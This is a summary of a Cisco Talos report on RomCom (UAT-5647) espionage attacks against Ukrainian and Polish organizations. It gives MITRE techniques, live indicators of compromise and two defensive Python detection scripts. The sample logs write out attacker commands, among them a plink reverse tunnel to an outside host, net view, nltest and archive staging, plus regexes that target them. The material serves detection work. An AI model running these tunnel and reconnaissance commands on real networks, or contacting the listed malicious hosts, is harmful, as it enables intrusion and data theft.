Cisco Talos reports a new wave of attacks by the Russian-speaking group UAT-5647 (RomCom) against Ukrainian government entities and Polish organizations, using an updated RomCom variant named SingleCamper alongside additional malware families. The operation is geared toward long-term espionage access and data exfiltration, combining edge-device tunneling, internal reconnaissance and staged collection, with possible ransomware deployment as a secondary objective; the tooling spans Go, C++, Rust, and Lua.
Keypoints
- UAT-5647 (RomCom) is targeting Ukrainian government entities and Polish organizations.
- The latest attacks deploy SingleCamper, loaded directly from the registry into memory, as part of the RomCom family.
- Four malware families are identified: the RustyClaw and MeltingClaw downloaders and the DustyHammock and ShadyHammock backdoors.
- Edge-device tunneling and lateral movement are used to expand access within target networks.
- Tooling now spans multiple languages, including Go, C++, Rust, and Lua.
- The infection chain begins with spear-phishing delivering downloaders, followed by backdoors and post-compromise activity.
- Post-compromise activities emphasize reconnaissance and data exfiltration, with a dual path toward long-term espionage and possible ransomware deployment.
MITRE Techniques
- [T1572] Protocol Tunneling – PuTTY’s Plink was downloaded to establish remote tunnels. Quote: ‘download PuTTY’s Plink tool to establish remote tunnels.’
- [T1018] Remote System Discovery – Repeated ping sweeps to locate neighbouring hosts. Quote: ‘repeated ping sweeps they carried out to find adjoining systems.’
- [T1135] Network Share Discovery – net view used to enumerate shares on specific internal IPs; the command was issued three times (backslashes restored here, addresses redacted as in the report). Quote: ‘net view /all \\192[.]168[.]XXX[.]XXX’
- [T1082] System Information Discovery – System information gathered with standard built-in commands.
- [T1482] Domain Trust Discovery – nltest used to discover domain trusts. Quote: ‘nltest to discover domain trusts.’
- [T1560] Archive Collected Data – Entire drives and specific folders were staged into archives for exfiltration.
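The reconnaissance and tunneling commands above are what a detection engineer would hunt for in process-creation telemetry (Sysmon event 1, Windows 4688 or an EDR equivalent). The following Python is an added example written for this summary, not code from Talos or from the report. It runs a few command-line rules (net view share enumeration, nltest trust discovery, plink with a forwarding switch, archive creation) plus a ping-sweep heuristic over constructed process-creation events (the host names, addresses, user name and timestamps are made up), then triages hosts by how many distinct techniques they show, since the chained pattern is what separates this activity from a one-off admin command. The thresholds (five distinct ping targets within five minutes, three techniques to triage) are assumptions to tune for your environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events, one per line: "ISO timestamp|host|command line".
# Hostnames, addresses, user name and times are made up for this example.
SAMPLE_EVENTS = r"""
2024-10-15T09:00:01|WS-014|ping -n 1 192.168.20.11
2024-10-15T09:00:02|WS-014|ping -n 1 192.168.20.12
2024-10-15T09:00:03|WS-014|ping -n 1 192.168.20.13
2024-10-15T09:00:04|WS-014|ping -n 1 192.168.20.14
2024-10-15T09:00:05|WS-014|ping -n 1 192.168.20.15
2024-10-15T09:00:06|WS-014|ping -n 1 192.168.20.16
2024-10-15T09:01:10|WS-014|net view /all \\192.168.20.12
2024-10-15T09:01:11|WS-014|net view /all \\192.168.20.13
2024-10-15T09:02:30|WS-014|nltest /domain_trusts
2024-10-15T09:05:00|WS-014|plink.exe -N -R 8443:127.0.0.1:3389 svc@203.0.113.10 -pw x
2024-10-15T09:10:00|WS-014|7z.exe a C:\Users\jdoe\Documents\d.zip C:\Users\jdoe\Documents\*
2024-10-15T09:30:00|WS-027|ping -n 4 fileserver01
2024-10-15T09:31:00|WS-027|net view \\fileserver01
"""

# Command-line rules for the techniques quoted in the report. Rule names carry
# the ATT&CK ID so findings map straight back to the technique list.
RULES = [
    ("T1135 share enumeration", re.compile(r"^net1?(\.exe)?\s+view\b.*\\\\", re.I)),
    ("T1482 domain trust discovery", re.compile(r"^nltest(\.exe)?\s+/domain_trusts", re.I)),
    ("T1572 plink tunnel", re.compile(r"\bplink(\.exe)?\b.*\s-[RLD]\s", re.I)),
    ("T1560 archive staging", re.compile(r"(^7z(\.exe)?\s+a\s|Compress-Archive)", re.I)),
]

def parse_events(text):
    """Parse the pipe-separated sample format into (timestamp, host, command)."""
    events = []
    for line in text.strip().splitlines():
        ts, host, cmd = line.split("|", 2)
        events.append((datetime.fromisoformat(ts), host, cmd.strip()))
    return events

def ping_target(cmd):
    """Return the target of a ping command, or None if this is not a ping."""
    parts = cmd.split()
    if len(parts) < 2 or parts[0].lower() not in ("ping", "ping.exe"):
        return None
    target = parts[-1]
    return None if target.startswith("-") else target

def analyze(text, sweep_threshold=5, window=timedelta(minutes=5)):
    """Return {host: [(rule, evidence), ...]} for every host with a finding.

    sweep_threshold and window are assumed tuning values: a host that pings at
    least sweep_threshold distinct targets inside one window is flagged as sweeping.
    """
    findings = defaultdict(list)
    pings = defaultdict(list)
    for ts, host, cmd in parse_events(text):
        for name, rx in RULES:
            if rx.search(cmd):
                findings[host].append((name, cmd))
        target = ping_target(cmd)
        if target:
            pings[host].append((ts, target))
    for host, hits in pings.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            targets = {tgt for ts, tgt in hits[i:] if ts - start <= window}
            if len(targets) >= sweep_threshold:
                findings[host].append(("T1018 ping sweep",
                                       f"{len(targets)} distinct targets within {window}"))
                break
    return dict(findings)

def triage(findings, min_rules=3):
    """Hosts showing at least min_rules distinct techniques: the chained
    recon -> tunnel -> staging pattern rather than a single admin command."""
    return sorted(h for h, hits in findings.items() if len({r for r, _ in hits}) >= min_rules)

if __name__ == "__main__":
    results = analyze(SAMPLE_EVENTS)
    for host in triage(results):
        print(host)
        for rule, evidence in results[host]:
            print(f"  {rule}: {evidence}")
```

Run against the sample, WS-014 trips all five rules and is the only host triaged; WS-027's single `net view` is recorded but stays below the triage bar, which is the intended behaviour for ordinary administrative use.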
Indicators of Compromise
- [SHA256 Hash] – RustyClaw and related payloads. 12bf973b503296da400fd6f9e3a4c688f14d56ce82ffcfa9edddd7e4b6b93ba9, 260a6644ab63f392d090853ccd7c4d927aba3845ced473e13741152cdf274bbd
- [Domain] – dnsresolver.online, apisolving.com
- [URL] – hxxp://apisolving.com:443/DKgitTDJfiP
- [IP Address] – 213.139.205.23, 23.94.207.116
- [File Path] – C:\Users\<username>\AppData\Roaming\microsoft\Windows\Recent, C:\Users\<username>\Documents\d.zip (backslashes restored; the user name is not given in the report)
- [Registry Key] – HKCU\SOFTWARE\Classes\CLSID\{2155fee3-2419-4373-b102-6843707eb41f}\InprocServer32
- [IPNS path] – /ipns/k51qzi5uqu5dgn9wgsaxb7cfvinmk27eusoufaxrp8qd1ri5kamf41bg7gpydm
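Matching the indicators above against telemetry is mostly a normalization problem: published indicators are defanged (hxxp, [.]), registry keys turn up under different hive spellings (HKCU versus HKEY_CURRENT_USER) and mixed case, and hashes vary in case. The Python below is an added example for this summary, not Talos code. It refangs and normalizes the indicators listed above and matches them against constructed DNS, proxy and registry-export samples; the log format, hostnames, timestamps and the benign second hash (SHA-256 of empty input) are made up and not from the report.

```python
import re

# Indicators listed above, kept exactly as published (the URL is defanged "hxxp").
PUBLISHED_IOCS = {
    "sha256": [
        "12bf973b503296da400fd6f9e3a4c688f14d56ce82ffcfa9edddd7e4b6b93ba9",
        "260a6644ab63f392d090853ccd7c4d927aba3845ced473e13741152cdf274bbd",
    ],
    "domain": ["dnsresolver.online", "apisolving.com"],
    "url": ["hxxp://apisolving.com:443/DKgitTDJfiP"],
    "ip": ["213.139.205.23", "23.94.207.116"],
    "registry": [
        r"HKCU\SOFTWARE\Classes\CLSID\{2155fee3-2419-4373-b102-6843707eb41f}\InprocServer32",
    ],
}

# Constructed telemetry for the example: hostnames, timestamps and the benign
# second hash (SHA-256 of empty input) are made up, not from the report.
SAMPLE_DNS_LOG = """
2024-10-16T10:01:12 WS-014 query A apisolving.com -> 213.139.205.23
2024-10-16T10:01:13 WS-014 query A update.example.com -> 198.51.100.7
2024-10-16T10:02:40 WS-031 query A DNSRESOLVER.ONLINE -> 23.94.207.116
"""
SAMPLE_PROXY_LOG = """
2024-10-16T10:01:14 WS-014 GET http://apisolving.com:443/DKgitTDJfiP 200
2024-10-16T10:05:00 WS-031 GET http://update.example.com/ok 200
"""
SAMPLE_REG_EXPORT = r"""
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{2155fee3-2419-4373-b102-6843707eb41f}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{2155fee3-2419-4373-b102-6843707eb41f}\InprocServer32]
"""
SAMPLE_HASHES = [
    "12BF973B503296DA400FD6F9E3A4C688F14D56CE82FFCFA9EDDDD7E4B6B93BA9",
    "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
]

HIVE_ALIASES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE",
                "HKCR": "HKEY_CLASSES_ROOT", "HKU": "HKEY_USERS"}

def refang(value):
    """Undo common defanging: hxxp -> http, [.] or (.) -> ., [:] -> :."""
    value = re.sub(r"^hxxp", "http", value.strip(), flags=re.I)
    value = re.sub(r"[\[(]\.[\])]", ".", value)
    return value.replace("[:]", ":")

def normalize_registry(path):
    """Expand hive abbreviations and fold case so 'HKCU\\Software\\X' and a
    .reg header '[HKEY_CURRENT_USER\\SOFTWARE\\X]' compare equal."""
    path = path.strip().strip("[]").replace("/", "\\")
    hive, sep, rest = path.partition("\\")
    return (HIVE_ALIASES.get(hive.upper(), hive.upper()) + sep + rest).lower()

def normalize(kind, value):
    if kind == "registry":
        return normalize_registry(value)
    if kind == "sha256":
        return value.strip().lower()
    return refang(value)

def scan(dns_log, proxy_log, reg_export, observed_hashes):
    """Return [(kind, indicator, evidence)] for every indicator hit."""
    iocs = {k: [normalize(k, v) for v in vals] for k, vals in PUBLISHED_IOCS.items()}
    hits = []
    # Network indicators: token-bounded, case-insensitive substring match, so
    # "apisolving.com" hits sub.apisolving.com but not "apisolving.community".
    for line in (dns_log + "\n" + proxy_log).splitlines():
        line = line.strip()
        if not line:
            continue
        for kind in ("domain", "url", "ip"):
            for ioc in iocs[kind]:
                if re.search(r"(?<![\w-])" + re.escape(ioc) + r"(?![\w-])", line, re.I):
                    hits.append((kind, ioc, line))
    # Registry: compare normalized key headers from a .reg export.
    for line in reg_export.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = normalize_registry(line)
            if key in iocs["registry"]:
                hits.append(("registry", key, line))
    # Hashes: exact match after case folding.
    for h in observed_hashes:
        if h.strip().lower() in iocs["sha256"]:
            hits.append(("sha256", h.strip().lower(), h))
    return hits

if __name__ == "__main__":
    for kind, ioc, evidence in scan(SAMPLE_DNS_LOG, SAMPLE_PROXY_LOG, SAMPLE_REG_EXPORT, SAMPLE_HASHES):
        print(f"{kind:8} {ioc}\n         {evidence}")
```

Note that the URL indicator is HTTP on port 443, so a matcher that strips "default" ports or assumes TLS on 443 would miss it; the example keeps the port as published. The parent CLSID key in the export is deliberately not matched, only the InprocServer32 subkey listed as the indicator.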
Read more: https://blog.talosintelligence.com/uat-5647-romcom/